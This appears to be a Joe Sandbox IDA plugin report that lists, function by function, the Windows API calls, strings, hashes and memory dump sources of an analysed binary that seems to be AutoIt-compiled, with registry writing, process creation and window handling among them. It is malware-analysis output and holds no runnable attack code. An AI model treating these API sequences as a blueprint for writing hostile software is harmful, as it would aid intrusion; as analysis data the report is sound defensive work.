SetUserObjectSecurity.USER32(?,00000004,?), ref: 00240F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F6E
HeapFree.KERNEL32(00000000), ref: 00240F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F7E
HeapFree.KERNEL32(00000000), ref: 00240F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F8E
HeapFree.KERNEL32(00000000), ref: 00240F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00240FA1
HeapFree.KERNEL32(00000000), ref: 00240FA8

Part of subcall function 00241193: GetProcessHeap.KERNEL32(00000008,00240BB1,?,00000000,?,00240BB1,?), ref: 002411A1
Part of subcall function 00241193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00240BB1,?), ref: 002411A8
Part of subcall function 00241193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00240BB1,?), ref: 002411B7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8163d1e0961e552981dc9cd53e557a847dc6d3290f9e41dfc0923efd14e73255
Instruction ID: 844cb7ce119d0f924cd2717cd09126afe22d29fea8ab4fb2c72aa41157c73310
Opcode Fuzzy Hash: 8163d1e0961e552981dc9cd53e557a847dc6d3290f9e41dfc0923efd14e73255
Instruction Fuzzy Hash: FB71817191020AEFDF249FA4EC88FAEBBB8BF04300F154129FA19E7151DB749995CB60

Function 0026C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0027CC08,00000000,?,00000000,?,?), ref: 0026C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0026C5A4
_wcslen.LIBCMT ref: 0026C5F4
_wcslen.LIBCMT ref: 0026C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0026C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0026C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0026C84D
RegCloseKey.ADVAPI32(?), ref: 0026C881
RegCloseKey.ADVAPI32(00000000), ref: 0026C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0026C960

Strings

REG_EXPAND_SZ, xrefs: 0026C5CD
REG_QWORD, xrefs: 0026C8C3
REG_DWORD, xrefs: 0026C804
REG_MULTI_SZ, xrefs: 0026C6F5
REG_BINARY, xrefs: 0026C913
REG_SZ, xrefs: 0026C644

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 5503febcc09fe92d83f3b24dba22805c342c2e69e95181408d29b395649b9da3
Instruction ID: 85c25fc2b1cf179ba6688924edd7abfd552ccbaa937da0f659ce011b7640c637
Opcode Fuzzy Hash: 5503febcc09fe92d83f3b24dba22805c342c2e69e95181408d29b395649b9da3
Instruction Fuzzy Hash: A11278352146419FD715EF25D881A2EB7E5FF88714F24885CF88A9B3A2DB31EC91CB81

Function 0027091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002709C6
_wcslen.LIBCMT ref: 00270A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00270A54
_wcslen.LIBCMT ref: 00270A8A
_wcslen.LIBCMT ref: 00270B06
_wcslen.LIBCMT ref: 00270B81

Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD

Part of subcall function 00242BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00242BFA

Strings

UNCHECK, xrefs: 00270D3E
CHECK, xrefs: 00270A85, 00270AA0
EXPAND, xrefs: 00270BF8
SELECT, xrefs: 00270D11
EXISTS, xrefs: 00270B7C, 00270B97
GETITEMCOUNT, xrefs: 00270C1E
COLLAPSE, xrefs: 00270B01, 00270B1C
GETTEXT, xrefs: 00270C97
GETSELECTED, xrefs: 00270C4E
GETTOTALCOUNT, xrefs: 002709F2, 00270A17
ISCHECKED, xrefs: 00270CE1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 398d37a60e56f685dcdc4405eccee05ccf54befd31dbb34301d8474338d6941d
Instruction ID: 8db3f30f393a80d044297816b6870e1c01fbe41c3888b1f3ce405ba42e82e8e4
Opcode Fuzzy Hash: 398d37a60e56f685dcdc4405eccee05ccf54befd31dbb34301d8474338d6941d
Instruction Fuzzy Hash: E0E18C31228742CFC714DF25C49092AB7E1BF99318F14895DF89A5B3A2DB70ED59CB81

Function 0026C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
_wcslen.LIBCMT ref: 0026C9F1
_wcslen.LIBCMT ref: 0026CA68
_wcslen.LIBCMT ref: 0026CA9E
_wcslen.LIBCMT ref: 0026CAF9
_wcslen.LIBCMT ref: 0026CB2F
_wcslen.LIBCMT ref: 0026CB7F

Strings

HKCR, xrefs: 0026CB29, 0026CB2E
HKEY_CURRENT_USER, xrefs: 0026CBBD
HKEY_USERS, xrefs: 0026CBDF
HKEY_CLASSES_ROOT, xrefs: 0026CAF3, 0026CAF8
HKCU, xrefs: 0026CBCE
HKEY_LOCAL_MACHINE, xrefs: 0026CA62, 0026CA67
HKCC, xrefs: 0026CBAC
HKLM, xrefs: 0026CA98, 0026CA9D
HKEY_CURRENT_CONFIG, xrefs: 0026CB79, 0026CB7E
HKU, xrefs: 0026CBF0

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 154293fd3cfd3bb272d0ec6e87564c6241eecc4d3d18c656862df24af12ecd53
Instruction ID: 47aecdf934533dd73ab1c720f64670f48ff2241af890fb34112f3b490cbf8136
Opcode Fuzzy Hash: 154293fd3cfd3bb272d0ec6e87564c6241eecc4d3d18c656862df24af12ecd53
Instruction Fuzzy Hash: 0A71F43263016B8BCB20FEBCCC515BE3395AF61754B350129F89697285EA71CDE583A0

Function 0027833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0027835A
_wcslen.LIBCMT ref: 0027836E
_wcslen.LIBCMT ref: 00278391
_wcslen.LIBCMT ref: 002783B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002783F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00275BF2), ref: 0027844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00278487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002784CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00278501
FreeLibrary.KERNEL32(?), ref: 0027850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0027851D
DestroyIcon.USER32(?,?,?,?,?,00275BF2), ref: 0027852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00278549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00278555

Strings

.icl, xrefs: 00278368
.exe, xrefs: 00278388
.dll, xrefs: 002783AB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: f5edcdf25447a6c1f938239bdce72f9eada78d33961c3a2e416823200c396283
Instruction ID: 25cf5900664c83f6abc49e2b811296243304997e97e13b8d3518b03fd76f6e04
Opcode Fuzzy Hash: f5edcdf25447a6c1f938239bdce72f9eada78d33961c3a2e416823200c396283
Instruction Fuzzy Hash: 3A61E2B1560606BAEB14DF74DC89BBF77A8BF04711F108509F919D60D1DFB4A9A0CBA0

Function 001E7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Unterminated group of comments, xrefs: 0022528C
#pragma compile, xrefs: 001E77D3
', xrefs: 00225169
#comments-start, xrefs: 001E785F, 001E78B1
Bad directive syntax error, xrefs: 0022519A
#ce, xrefs: 001E78ED
#include-once, xrefs: 001E782F
#comments-end, xrefs: 001E78D9
#cs, xrefs: 001E7873, 001E78C5
#OnAutoItStartRegister, xrefs: 001E7817
#requireadmin, xrefs: 001E77FF
#notrayicon, xrefs: 001E77E7
#include, xrefs: 001E7847
", xrefs: 00225153
Cannot parse #include, xrefs: 00225279

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 238e5efd73649ec7b9377ef21664709f7885fd0c645fbe5640adfefaed86554f
Instruction ID: 91dca887424ef2019ec5c0c91a348952392117925ebba6d9982282a183079fe9
Opcode Fuzzy Hash: 238e5efd73649ec7b9377ef21664709f7885fd0c645fbe5640adfefaed86554f
Instruction Fuzzy Hash: D181FB71A14A15BBEB25AFA1DC46FBF3768AF15300F048024FD09AB1D6EB70D961CB91

Function 00245A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00245A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00245A40
SetWindowTextW.USER32(?,?), ref: 00245A57
GetDlgItem.USER32(?,000003EA), ref: 00245A6C
SetWindowTextW.USER32(00000000,?), ref: 00245A72
GetDlgItem.USER32(?,000003E9), ref: 00245A82
SetWindowTextW.USER32(00000000,?), ref: 00245A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00245AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00245AC3
GetWindowRect.USER32(?,?), ref: 00245ACC
_wcslen.LIBCMT ref: 00245B33
SetWindowTextW.USER32(?,?), ref: 00245B6F
GetDesktopWindow.USER32 ref: 00245B75
GetWindowRect.USER32(00000000), ref: 00245B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00245BD3
GetClientRect.USER32(?,?), ref: 00245BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00245C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00245C2F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 910a7e410e18b6559d09dce2087c267b1c66878a572a2751c9a647a9f5aeaa50
Instruction ID: 62b2efcacafa0f9f2e25ea43bc8fdceae98f3ed3daa1d08de939c61821214c26
Opcode Fuzzy Hash: 910a7e410e18b6559d09dce2087c267b1c66878a572a2751c9a647a9f5aeaa50
Instruction Fuzzy Hash: D2719C31910B1AAFCB24DFA8CE89AAEBBF5FF48704F10451CE586A25A5D770E950CF50

Function 002430F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0024318D
_wcslen.LIBCMT ref: 002431F8

Strings

TEXT, xrefs: 0024347C
NAME, xrefs: 00243335, 00243346
REGEXPCLASS, xrefs: 00243255, 00243266
CLASS, xrefs: 00243188, 002431A5
INSTANCE, xrefs: 00243453
[*, xrefs: 0024339A
CLASSNN, xrefs: 002431F3, 00243204

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[*
API String ID: 176396367-998612648
Opcode ID: 87c5bf9931cf258698161ecb1cdc8318318eeb891d972c66cfd11885b08c859f
Instruction ID: 6abcf6daf3bfbfbde97616f5fe80628f82615368256d41ee50a75c67fa9756a3
Opcode Fuzzy Hash: 87c5bf9931cf258698161ecb1cdc8318318eeb891d972c66cfd11885b08c859f
Instruction Fuzzy Hash: 3EE1F732A20617ABCB1CDF74C4416EEFBB0BF54710F548129E956E7280DF70AEA58B90

Function 002000C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002000C6

Part of subcall function 002000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(002B070C,00000FA0,945E082B,?,?,?,?,002223B3,000000FF), ref: 0020011C
Part of subcall function 002000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002223B3,000000FF), ref: 00200127
Part of subcall function 002000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002223B3,000000FF), ref: 00200138
Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0020014E
Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0020015C
Part of subcall function 002000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0020016A
Part of subcall function 002000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00200195
Part of subcall function 002000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002001A0

___scrt_fastfail.LIBCMT ref: 002000E7

Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9

Strings

InitializeConditionVariable, xrefs: 00200148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00200122
kernel32.dll, xrefs: 00200133
WakeAllConditionVariable, xrefs: 00200162
SleepConditionVariableCS, xrefs: 00200154

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 735567263aedf6911d6b9b5fc1ac99fb18204d3a315a03151184d53bca78ecd8
Instruction ID: 1abb683090998709eba8c9d48f5f1fb0df7e3899e4a23fe479b8731857d10fef
Opcode Fuzzy Hash: 735567263aedf6911d6b9b5fc1ac99fb18204d3a315a03151184d53bca78ecd8
Instruction Fuzzy Hash: E721F9326647116BF7215F74BC8DB6AB394EB06B51F11413EF90D922D2DFB098108AA0

Function 002544C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0027CC08), ref: 00254527
_wcslen.LIBCMT ref: 0025453B
_wcslen.LIBCMT ref: 00254599
_wcslen.LIBCMT ref: 002545F4
_wcslen.LIBCMT ref: 0025463F
_wcslen.LIBCMT ref: 002546A7

Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD

GetDriveTypeW.KERNEL32(?,002A6BF0,00000061), ref: 00254743

Strings

ramdisk, xrefs: 002546F1
all, xrefs: 00254531, 00254536
unknown, xrefs: 00254708
removable, xrefs: 002545EA, 002545EF
cdrom, xrefs: 0025458F, 00254594
fixed, xrefs: 00254635, 0025463A
network, xrefs: 0025469D, 002546A2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 25d8407ac7df93cb66e9d27f486f5ff3588261a3309ffcd75014e9104e54b4ba
Instruction ID: 2ee2c7398f7c3c0dc452ee8a37269dd5860fb09998b997c36bd018fa0de16004
Opcode Fuzzy Hash: 25d8407ac7df93cb66e9d27f486f5ff3588261a3309ffcd75014e9104e54b4ba
Instruction Fuzzy Hash: 27B104316283029FC710EF28C890A7EF7E5AFA5769F50491DF896C7291E730D899CB52

Function 0027911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

DragQueryPoint.SHELL32(?,?), ref: 00279147

Part of subcall function 00277674: ClientToScreen.USER32(?,?), ref: 0027769A
Part of subcall function 00277674: GetWindowRect.USER32(?,?), ref: 00277710
Part of subcall function 00277674: PtInRect.USER32(?,?,00278B89), ref: 00277720

SendMessageW.USER32(?,000000B0,?,?), ref: 002791B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002791BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002791DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00279225
SendMessageW.USER32(?,000000B0,?,?), ref: 0027923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00279255
SendMessageW.USER32(?,000000B1,?,?), ref: 00279277
DragFinish.SHELL32(?), ref: 0027927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00279371

Strings

@GUI_DRAGFILE, xrefs: 00279320
@GUI_DRAGID, xrefs: 002792E9
@GUI_DROPID, xrefs: 0027929E
p#+, xrefs: 002792BB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#+
API String ID: 221274066-3707098397
Opcode ID: c7e3481f970ce1cb3c2f3cd78d6a184081dd6cc28e9edebc6d53b2da4028288f
Instruction ID: ec2bb82bf6c5b1b030ca4100b1dd1a7ca9c789f86a2448293d3826cd393e2bd7
Opcode Fuzzy Hash: c7e3481f970ce1cb3c2f3cd78d6a184081dd6cc28e9edebc6d53b2da4028288f
Instruction Fuzzy Hash: 5C61BD31108341AFC304EF64DC89DAFBBE8EF99350F50091DF595931A1DB309A99CB92

Function 0026AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0026B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026B1D4
_wcslen.LIBCMT ref: 0026B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0026B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0026B236
_wcslen.LIBCMT ref: 0026B332

Part of subcall function 002505A7: GetStdHandle.KERNEL32(000000F6), ref: 002505C6

_wcslen.LIBCMT ref: 0026B34B
_wcslen.LIBCMT ref: 0026B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0026B3B6
GetLastError.KERNEL32(00000000), ref: 0026B407
CloseHandle.KERNEL32(?), ref: 0026B439
CloseHandle.KERNEL32(00000000), ref: 0026B44A
CloseHandle.KERNEL32(00000000), ref: 0026B45C
CloseHandle.KERNEL32(00000000), ref: 0026B46E
CloseHandle.KERNEL32(?), ref: 0026B4E3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: c8945fd7b66686f763cc7f8364eab88dd53628c29756644d9d9e3ad08eb583b5
Instruction ID: d70562705ddb109a02a4cfb97b5ea98c255b9e02a6ec9310c0f9fe9d58b89b69
Opcode Fuzzy Hash: c8945fd7b66686f763cc7f8364eab88dd53628c29756644d9d9e3ad08eb583b5
Instruction Fuzzy Hash: 5DF1CD316183419FDB15EF24D891B2FBBE0AF85314F14845DF8898B2A2DB31EC95CB92

Function 001E326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(002B1990), ref: 00222F8D
GetMenuItemCount.USER32(002B1990), ref: 0022303D
GetCursorPos.USER32(?), ref: 00223081
SetForegroundWindow.USER32(00000000), ref: 0022308A
TrackPopupMenuEx.USER32(002B1990,00000000,?,00000000,00000000,00000000), ref: 0022309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002230A9

Strings

0, xrefs: 001E327D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
